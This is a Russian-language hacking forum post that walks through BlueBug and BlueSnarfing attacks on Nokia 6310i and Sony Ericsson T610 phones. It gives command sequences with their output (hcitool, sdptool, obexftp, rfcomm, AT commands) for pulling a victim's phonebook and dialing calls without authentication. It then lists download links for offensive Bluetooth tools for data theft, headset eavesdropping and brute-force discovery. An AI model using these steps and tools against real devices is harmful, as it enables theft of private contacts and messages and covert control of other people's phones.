вот некоторая интересная инфа по хакингу ВТ девайсов.
Bluetooth секурити: тест на прочностьОтбросив историю создания Bluetooth и технические подробности работы, перейду сразу к делу.
Данная статья предполагает наличие у читателя опыта работы с Linux и знания (хотя бы поверхностные) Bluetooth стека.
В прессе всё чаще и чаще стали появляться статьи о недостаточной защищённости Bluetooth соединений и возможностях атак как на сам стек, так и на устройства, на которых он (стек) установлен. В этой небольшой статье я попытаюсь показать как можно реализовать атаку на самые уязвимые модели сотовых телефонов (по данным
www.thebunker.net ), а именно Nokia 6310i и Sony Ericsson T610.
Специалисты в области безопасности выделяют несколько типов ошибок в работе Bluetooth, например такие:
• Неправильная обработка длинны пакета OBEX
• Ошибка в проверки целостности пакета OBEX
• Возможность осуществления DoS
• Существует возможность работать с определённым сервисом напрямую (в отдельных устройствах)
• Поддержка работы с AT-командами
На основе этих ошибок существует несколько типов атак, но лично я хочу выделить две: BlueBug и BlueSnarfing.
BlueBug – позволяет получить доступ к выполнению: AT- команд, чтению/записи SMS, чтению/редактированию телефонной книги.
BlueSnarfing – позволяет выкачивать любые данные с устройства начиная от календаря до мультимедийных файлов и есесено управлять телефонной книгой (для сотовых).
Скальпелем по “зубам”.
Для реализации атаки всего лишь необходимо напрямую обратиться к необходимой службе (см. рисунок), а ошибки в реализации протокола приведут к выполнению наших команд на уязвимом устройстве. Попробуем настроить взаимодействие с OBEX и интерпретатором AT-команд в обход системы аутентификации:
\ ищем активные устройства
[root@localhost /]# hcitool scan
Scanning ...
00:0E:07:27:9B:09 Darklight<t610(bj)
\ просматриваем открытые сервисы
[root@localhost /]# sdptool browse 00:0E:07:27:9B:09
Browsing 00:0E:07:27:9B:09
...
\ А вот и сервис передачи/приёма файлов
Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 10
............................................................
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
.............................................................
Service Name: OBEX Basic Imaging
Service RecHandle: 0x1000b
Service Class ID List:
"" (0x111b)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Profile Descriptor List:
"" (0x111a)
Version: 0x0100
............................................................
\ подключаемся к открытому 10-ому каналу и скачиваем файл…… допустим……. телефонной книги
[root@localhost /]# obexftp -b 00:0E:07:27:9B:09 -B 10 -g telecom/pb.vcf
Browsing 00:0E:07:27:9B:09
Channel: 7
No custom transport
Connecting...bt: 1
done
Receiving
telecom/pb.vcf.../done
Disconnecting...done
Вот и вся атака
Теперь попытаемся получить доступ к выполнению АТ-команд, для этого воспользуемся программой rfcomm для управления пакетами в данном протоколе. Здесь мы попытаемся подключится к параллельному порту сотового.
[root@localhost /]# hcitool scan
Scanning ...
00:63:59:56:3C:F4 Darklight<Nokia 6310i>
\ закрепляем мобильный за rfcomm0 портом
[root@localhost /]# rfcomm bind /dev/rfcomm0 00:63:59:56:3C:F4
\ далее при помощи программы Gnokii или напрямую вводя AT-команды управляем сотовым
[root@localhost /]# cu -l rfcomm0 -s 9600
Connected.
[ATE1]
OK
ATI
Nokia
OK
AT+CPBS?
+CPBS: "SM",0,100
OK
AT+CPBR=?
+CPBR: (1-100),48,18
OK
ATDT+ телефонный номер для набора
OK
Набор софта для bluetooth хакингаBlooover
Платформа: Телефоны с поддержкой J2ME (с поддержкой MIDP 2.0 и JSR-82 (Bluetooth API))
Download
http://trifinite.org/Downloads/Blooover.jarBlooover J2ME утилита аудита Bluetooth на сотовых телефонах. Позволяет обнаруживать уязвимые телефоны и скачивать из них персональную информацию.
PS: Blooover theme for Series60 phones
Download
http://trifinite.org/Downloads/Blooover_theme.sisBlueZ
Платформа: Linux
Cтек протокола Bluetooth для Linux, разработан в Qualcomm и включён в ядро Linux начиная с версии 2.4.18, но необходима доустановка данного пакета библиотек и утилит. К bluetooth hack'у относится тем, что основные атаки реализуются стандартными средствами.
Данный пакет включает следующие утилиты:
hcitool - сканер Bluetooth (с интерфейсом командной строки), позволяет обнаруживать все устройства, находящееся в открытом режиме. Справку (man) по hcitool можно найти здесь
l2ping - Bluetooth-версия команды "ping"
l2test - утилита для тестирования устройств
hcidump - пакетный снифер, bluetooth-версия утилиты tcpdump
также содержит демоны - hcid, hciemud и конфигурационную утилиту hciconfig
Download
http://x25.com.ru/tools/bt/bluez-1.1.tar.gzBluesniff
Платформа: Linux
Сканер Bluetooth устройств, может работать в двух режимах:
1. Normal Scan - обнаружение только видимых устройств
2. Brute Force Scan - осуществляет перебор по МАС адресам с помошью утилиты redfang и выводит результаты в более понятном формате.
Download
http://www.25.net.ru/tools/bt/bluesniff.tar.gzCar Whisperer
Платформа: Linux
Небольшое и удобное приложение позволяет принимать и передавать звук на чужие Bluetooth-гарнитуры.
Download
http://www.25.net.ru/tools/bt/carwhisperer-0.1.tar.gzHeloMoto
Платформа: Linux
Позволяет извлекать приватную информацию через bluetooth из ранних моделей телефонов Motorola V-Series.
Работает только со стеком BlueZ.
Download
http://www.25.net.ru/tools/bt/helomoto.tgzBT Audit
Платформа: Linux
Программа для security-аудита bluetooth устройств.
Download
http://www.25.net.ru/tools/bt/bt_audit-0.1.tar.gzBT-Devices Viewer
Версия: 0.16a
Платформа: Windows
BT-Devices Viewer - это программа для ведения журнала найденных с помощью Bluetooth-модуля компьютера устройств с подробной информацией о каждом из них: имя, уникальный MAC-адрес, время нахождения, класс устройства. А главное, программа показывает, какое именно устройство найдено! То есть, не только имя, которое можно изменить на что угодно, а ещё и модель устройства! Теперь такие изощрённые программы как BTClass для PalmOS не скроют истинной сущности Bluetooth телефона, КПК или другого устройства.
Download
http://bluejack.ru/files/windows/BTDevView/BTDevices_0_17a.rarBlueScanner
Платформа: Windows
Еще один сканер. Так же выводит подробную информацию о найденных устройствах: тип устройства, модель и т.д., плюс список доступных сервисов.
Download
http://www.25.net.ru/tools/bt/BlueScannerSetup_1_1_1_0.zipBlueSweep
Платформа: Windows
И еще один сканер. Делает тоже что и два предыдущих, плюс должен еще поидее делать аудит уязвимостей устройства.
Download
http://www.airmagnet.com/products/assets/AirMagnet_BlueSweep_Setup.exeBlooover II
Платформа: Телефоны с поддержкой J2ME (с поддержкой MIDP 2.0 и JSR-82 (Bluetooth API))
Download
http://trifinite.org/Downloads/Blooover2.jarhttp://trifinite.org/Downloads/Blooover2b.jarBtscanner 2.1
Платформа: Linux
btscanner - инструмент, разработанный специально для того, чтобы извлечь как можно больше информации о Bluetooth устройстве до процесса соединения. Детальные информационный экран извлекает информацию из HCI и SDP и поддерживает открытое подключение для контроля RSSI.
btscanner основан на BlueZ Bluetooth стеке (недавно включённый в ядро Linux) и BlueZ пакете сервисных программ .
btscanner также содержит полный листинг IEEE OUI номеров и таблицу поиска классов. При использовании информации, собранной из этих источников, возможно делать выводы относительно типа Bluetooth устройства.
Вторая версия известной утилиты для взлома сотовых, Blooover. Теперь кроме атаки BlueBug включает реализацию атаки HeloMoto, BlueSnarf и возможность посылать malformed объекты через OBEX.
Download
http://www.25.net.ru/tools/bt/btscanner-2.1.tar.bz2BTScanner for XP
Платформа: Windows
Версия btscanner для Windows XP. Для запуска необходимы bluecove libraries (JSR-82 Bluetooth API for Java) и сама Java.
Download
http://www.25.net.ru/tools/bt/btscanner_1_0_0.zipBlueDiving
Платформа: Linux
Универсальный набор bluetooth-хакера! Утилита из серии "all in one". Реализует все известные на сегодняшний день атаки на блутус устройства: BlueBug, bluesnarf, bluesnarf++, bluesmack, спуфинг mac-адреса, etc.
Работает со стеком BlueZ.
[Bluediving 0.3]
http://www.25.net.ru/tools/bt/bluediving-0.3.tgz[Bluediving 0.5]
http://www.25.net.ru/tools/bt/bluediving-0.5.tgz.gzPSM scan V 0.3
Платформа: Linux
Очень простой инструмент, чтобы просмотреть все L2CAP PSMs, чтобы найти открытый PSMs (которые не перечислены в SDP базе данных), эту программу можно называть bluetooth сканером портов
Download
http://www.betaversion.net/btdsd/psm_scan.tar.gzRedfang - The Bluetooth Hunter
Платформа: Linux
Redfang v2.5 - усовершенствованная версия, способная находит неподдающиеся обнаружению Bluetooth устройства путём подбора последних шести байт адреса устройства и выполнять функцию read_remote_name (). Эта новая версия с улучшенным программным кодом перечисляет сервисную информацию и поддерживает многопользовательский режим и способна поддерживать высокую скорость в передаче при этом режиме (максимальный теоретический предел 127 USB устройства). Этот выпуск Redfang был создан в сотрудничестве с QinetiQ, как часть их работы в DTI Next Wave Technologies project FORWARD.
Download
http://www.atstake.com/research/tools/info...fang.2.5.tar.gz Софт под Nokia 770 tablet PC HeloMoto-Maemo
http://trifinite.org/Downloads/helomoto-maemo.tgz BlueSerial-Maemo
http://trifinite.org/Downloads/blueserial-maemo.tgz BlueZObex-Maemo
http://trifinite.org/Downloads/bluez-obex-maemo.tgz Gnokii-Maemo
http://trifinite.org/Downloads/gnokii-0.6.9-maemo.tgzОт себя хочу сказать ОГРОМНОЕ СПАСИБО за предоставленную информацию сайту http://x25.com.ru